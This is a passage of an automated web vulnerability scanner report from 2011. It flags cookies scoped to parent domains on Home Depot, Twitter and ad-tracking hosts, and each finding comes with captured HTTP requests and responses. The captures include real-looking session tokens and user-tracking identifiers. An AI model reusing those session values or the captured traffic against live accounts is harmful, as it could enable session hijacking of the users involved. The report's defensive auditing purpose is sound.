The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_ref=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate%3Fcheck%3D*n%26jspStoreDir%3Dhdus%26contractId%3D2081191%26itemAdd%3Dtrue%26orderId%3D131526257%26quantity%3D1%26catalogId%3D10053%26orderItemId%3D339315499%26langId%3D-1%26URL%3DOrderItemDisplayViewShiptoAssoc%26catEntryId%3D202349118%26storeId%3D10051%26calculationUsageId%3D-1%26calculationUsageId%3D-2%26calculationUsageId%3D-5%26calculationUsageId%3D-6%26calculationUsageId%3D-7%26calculationUsageId%3D-8%26calculationUsageId%3D-9&dtmc_url=http%3A//www6.homedepot.com/how-to/index.html& HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www6.homedepot.com/how-to/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1310488553942310; DotomiRR2339=-1$1$1$; DotomiUser=330100732990473967$0$335422886; DotomiSession_2339=2_371600815342543870$330100732990473967$335422886$1310489049679; DotomiNet=2$DjQqblZ1RHBFAGVVBwt9WgdHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLS0BZYGNTeGNlUHFRLwVZaVwXXjkZDVJ%2BewxzCUIBXmZTVkB0IyQsBAsRWgAbDwY%3D

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:53:44 GMT
X-Name: dmc-o08
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
Set-Cookie: DotomiSession_2339=2_371600815342543870$330100732990473967$335422886$1310489624594; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$DjQqblZ1RHBFAGZZAQZ%2BVAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLS0BZYGBffm5mXnRRLwVZaVwXXjkZDVJ%2BewxzCUIBXmZTVkB0IyQsBAsRWgAbDwY%3D; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
Set-Cookie: DotomiRR2339=-1$1$1$; Domain=.dotomi.com; Expires=Wed, 13-Jul-2011 16:53:44 GMT; Path=/
Content-Type: text/html
Content-Length: 1521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

10.2. http://scribe.twitter.com/scribe previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://scribe.twitter.com
Path:	/scribe

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vUmhvZGVJc2xh%250AbmRFTUE6D2NyZWF0ZWRfYXRsKwhRUgYhMQE6B2lkIiU2M2Y1MDg3N2RhMTM0%250AODk3YmI1NTYwNDAzNTkyNWE1MzoMY3NyZl9pZCIlYzhlNzI5MTQ0Nzk1YjU0%250ANDhkNjk4YzJkMWFmMzQ1ZmUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f85f91307c1e2d3da5ae66c2d365ecfdde397c4f; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scribe?q=0241&log%5B%5D=%7B%22event_name%22%3A%22subnav%22%2C%22item%22%3A%22tweets%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22webclient%22%2C%22ts%22%3A1310519091845%7D&log%5B%5D=%7B%22event_name%22%3A%22web%3Aprofile%3A%3A%3Aimpression%22%2C%22noob_level%22%3Anull%2C%22internal_referer%22%3Anull%2C%22profile_id%22%3A61504755%2C%22context%22%3A%22profile%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22client_event%22%2C%22ts%22%3A1310519091867%7D&log%5B%5D=%7B%22event_name%22%3A%22stream-view%22%2C%22stream_name%22%3A%22User%22%2C%22user_id%22%3A0%2C%22page%22%3A%22profile%22%2C%22_category_%22%3A%22webclient%22%2C%22ts%22%3A1310519091888%7D HTTP/1.1
Host: scribe.twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A130884465537011414; k=173.193.214.243.1310208653927867; __utma=43838368.1598605414.1305368954.1310393759.1310519089.15; __utmb=43838368.1.10.1310519089; __utmc=43838368; __utmz=43838368.1310519089.15.8.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/cybersecurity/; __utmv=43838368.lang%3A%20en; _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vUmhvZGVJc2xh%250AbmRFTUE6D2NyZWF0ZWRfYXRsKwhRUgYhMQE6B2lkIiU2M2Y1MDg3N2RhMTM0%250AODk3YmI1NTYwNDAzNTkyNWE1MzoMY3NyZl9pZCIlYzhlNzI5MTQ0Nzk1YjU0%250ANDhkNjk4YzJkMWFmMzQ1ZmUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f85f91307c1e2d3da5ae66c2d365ecfdde397c4f

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:05:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310519144-24311-9025
ETag: "db04c7b378cb2db912c3ba8a5a774ee3"
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 01:05:44 GMT
Content-Transfer-Encoding: binary
X-Runtime: 0.01606
Content-Disposition: inline
Content-Type: image/gif; charset=utf-8
Content-Length: 43
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: b8a7614452c3d5517e8d7c8394afa4eff3f942eb
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiZodHRwOi8vdHdpdHRlci5jb20vUmhvZGVJc2xh%250AbmRFTUE6D2NyZWF0ZWRfYXRsKwhRUgYhMQE6B2lkIiU2M2Y1MDg3N2RhMTM0%250AODk3YmI1NTYwNDAzNTkyNWE1MzoMY3NyZl9pZCIlYzhlNzI5MTQ0Nzk1YjU0%250ANDhkNjk4YzJkMWFmMzQ1ZmUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f85f91307c1e2d3da5ae66c2d365ecfdde397c4f; domain=.twitter.com; path=/; HttpOnly
Connection: close

GIF89a.............!.......,...........D..;

10.3. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492757250%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cdUmHi5LdyePSUlqCjwXXsfwRdqQ%3d;Domain=.homedepot.com;Path=/
THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489157221%3a%3bC25%5fEXP%3d1362329157%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529;Domain=.homedepot.com;Expires=Sun, 03-Mar-2013 16:45:57 GMT;Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&catalogId=10053&quantity=1&orderItemId_0=339315499&orderItemId=339315499&langId=-1&catEntryId=202349118&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; Coradiantuserid=82f95932-9eee-1ce7-9678-00e0ed0ed026; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0245525d5f4f58455e445a4a422991; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; VISITORID=910187893; WCSSESSIONID=0000QiM4nuQJ3aVixF3NjrJw_1o:1146agca4; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eNone%5f%7eC26%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=JMxYfo5MdQHKu9q8vDJ%2brG6L1y0%3d%0a%3b2011%2d07%2d12+12%3a43%3a57%2e331%5f1308225529140%2d4164%5f10051%5f295945051%2c%2d1%2cUSD%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=2; s_pers=%20s_campaign%3Dno%2520value%7C1310490955491%3B%20s_prevPage%3Dmostpopular%7C1310490955494%3B%20p_30%3DCategory%7C1310490955496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Dmostpopular%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Emostpopular%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Dmostpopular%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_6%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489156635%3a%3bC25%5fEXP%3d1362329156%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; WCS_UNIQUE_ID=yDNOewjWomI76%2bqwH5XtmS%2f3xy4%3d%0a; WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492756905%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2c3eMnbb1h3WdO2u5VxBUQ9gMGN8U%3d

Response

HTTP/1.1 302 Moved Temporarily
Server: IBM_HTTP_Server
Surrogate-Control: no-store
Location: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&quantity=1&catalogId=10053&orderItemId=339315499&orderItemId_0=339315499&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202349118&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Tue, 12 Jul 2011 16:45:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 16:45:57 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita76%2fWC%5fTHD%5fccaita76%2f1310489157221%3a%3bC25%5fEXP%3d1362329157%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529;Domain=.homedepot.com;Expires=Sun, 03-Mar-2013 16:45:57 GMT;Path=/
Set-Cookie: WC_USERSESSION_295945051=295945051%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1310492757250%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cdUmHi5LdyePSUlqCjwXXsfwRdqQ%3d;Domain=.homedepot.com;Path=/

10.4. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

T_5sus=jd9%3A2zz6e%3A1; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/
rth=2-ll8nk2-jd9~2zz6e~1~1-77k~2zz5q~1~1-dlx~232i9~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=598&id=255&format=1310503191 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv-10~2011051519270862126421219180~59a3b184-a1c6-4aca-8101-9ed4e07fe4c6-31~3460050161923843111~375c6d96-66e4-4358-973b-0d6c0203afb3; dly2=3-lmv2b7-; dmg2=2-null7566%4051%4060+65%3A61%3A64%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lmv2b7-1~fkog64qf50c8~13uj~5al9~0-1~138yfzzfhnn6~136l~5hy9~1bcqu-; pct=1-oevyvt~gnyji5u3-vOrunivbe~gnyji5u2-yhpvq~gnyji5u3-; T_bmu3=77k%3A2zz5q%3A1; rth=2-ll8nk2-77k~2zz5q~1~1-dlx~232i9~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Date: Tue, 12 Jul 2011 20:39:51 GMT
Pragma: no-cache
Connection: close
Set-Cookie: T_bmu3=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_cure=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4qye=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5sus=jd9%3A2zz6e%3A1; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-jd9~2zz6e~1~1-77k~2zz5q~1~1-dlx~232i9~1~1-c8z~2029o~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-h4d~b20b~1~1-g96~9x0t~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Wed, 11-Jul-2012 20:39:52 GMT; Path=/
Content-Length: 0

10.5. http://ak1.abmr.net/is/www.burstnet.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.burstnet.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-FCCFE70FC078DF56F822F11184DD577711D1122C5237AE2450DD7C528764A808-B6B889F3E8363450BBEA94C78C886431A3DEBFBDA1848E28D8622FD8361BC0A3; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.burstnet.com?U=/enlightn/8171/99D2/&V=3-rh9n44mHYsRLbm+zoiYMT7qn+rYj+Xiz1ZIyeB%2fTJuiRaZwc2R1ZsA%3d%3d&I=364AB5B4B4DE32D&D=burstnet.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-6D09C81E483B985A8C970170ED8A390DC9D7E844E4FADC48A5FF1F1CB4BDF136-962A4C6AE45D1257D630E27E6C9C4842CB9EEE84D8216132129E6DE75E18BFFD

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.burstnet.com/enlightn/8171/99D2/?01AD=35NsWEwVsyHSe121SiR9iwgYe6LgCBL2ajyjhr10hlf28AYn5RiT8aA&01RI=364AB5B4B4DE32D&01NA=
Expires: Tue, 12 Jul 2011 20:39:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close
Set-Cookie: 01AI=2-2-FCCFE70FC078DF56F822F11184DD577711D1122C5237AE2450DD7C528764A808-B6B889F3E8363450BBEA94C78C886431A3DEBFBDA1848E28D8622FD8361BC0A3; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.6. http://ak1.abmr.net/is/www.imiclk.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.imiclk.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-ADF10014E4A43A066D5B2D3C72879A1FF451007B3D76D32FDC272F60C7891715-AC66A02713FC636745EAA11C681C5FB4381547F40591FF69D8FEF24E6B871AC5; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.imiclk.com?U=/cgi/r.cgi&V=3-qfDDCciHIXyt2Irl1Kmr5oyrkqgN%2fYy5l3G2%2f+6CedKCVse0QGcBN9hA6YEDmt2X&I=02572381EDA0358&D=www.imiclk.com&01AD=1&m=3&mid=GQuHAQvv&did=games HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.popcap.com/allgames.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-0F09B572DEDC4E19CCE2FC3D3FB1796F8193C44ADF634733BA45870558999840-78641FCDBFB471CBB3EE6872396948E29B863DB921DCF34961B4F56AAD8BCA6C

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.imiclk.com/cgi/r.cgi?01AD=2-2-6FE485614C0BA96C655D4B05A9C02B17EBF2C473C8B99D541110B62E6B105162-09F22A76A2DFA626E13613B1F948D0A8E9FF53D471AAFA67F35E933D3B3BDA13&01RI=02572381EDA0358&01NA=&m=3&mid=GQuHAQvv&did=games
Expires: Tue, 12 Jul 2011 20:39:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close
Set-Cookie: 01AI=2-2-ADF10014E4A43A066D5B2D3C72879A1FF451007B3D76D32FDC272F60C7891715-AC66A02713FC636745EAA11C681C5FB4381547F40591FF69D8FEF24E6B871AC5; expires=Wed, 11-Jul-2012 20:39:27 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.7. http://ak1.abmr.net/is/www.lowes.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.lowes.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-588A1646FB542241472A8B4440942118BA09C37ACD5A2B656F23045D42DB1862-E89A6F43FA6979A9F8EEDA48EC83D287A682F51269B1357F0CA7CF6B32B6B074; expires=Wed, 11-Jul-2012 21:30:48 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/www.lowes.com?U=/images/blank.gif&V=3-P%2fXkUX0BomDTWP2A4PNfzlC691C5HH5j9+allLRENBG7nSEOhAszDQ%3d%3d&I=2F94A1DBD58FE8F&D=lowes.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-D5D9220AA35D8439F0F42B617821A32CA8F3F33CDE5D411FA3F6E0316F5E941D-EA3B06293D2F4D903262810809104EA0CA2B8A09EF6105BEECFACF4E76C80952

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.lowes.com/images/blank.gif?01AD=3NY-YUTTJuGK2HiDQyNEZ_pXmPlUobdy-vZgQV0lZuWVlCd7sXS36Wg&01RI=2F94A1DBD58FE8F&01NA=
Expires: Tue, 12 Jul 2011 21:30:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:48 GMT
Connection: close
Set-Cookie: 01AI=2-2-588A1646FB542241472A8B4440942118BA09C37ACD5A2B656F23045D42DB1862-E89A6F43FA6979A9F8EEDA48EC83D287A682F51269B1357F0CA7CF6B32B6B074; expires=Wed, 11-Jul-2012 21:30:48 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

10.8. http://akamai.mathtag.com/sync/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://akamai.mathtag.com
Path:	/sync/img

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ts=1310488542; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT
mt_mop=10001:1310488542|10002:1310068527|4:1308922018|5:1310068391; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 16:35:42 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync/img?mt_exid=10001&mt_exuid=72A94FA79EF536BD82125331F1DA512C&rurl=4-y4KAKxbMbUW6%2fd2XlI2h7omXveorHH1wjE3YPYm1CcU78fAjlPlkmtyHROSto8g1IHztMlSiGkudhacrtA2vilpGScyJI9PpEUcqmEFv2zphJWXr%2ff8w2Y%2fyQykdVQFucM9exn2xomjGUAzUdNo8JSkUO0QrBwFBP61FHfjWIggU+CKyZPO8lg%3d%3d&V=3-xmZkZ0vxVlK+Qt0Cy0o%2fhjkSyICqOr15F%2fuz8Eau8RYdGQm+gll3R5yHYfIfaMxH HTTP/1.1
Host: akamai.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
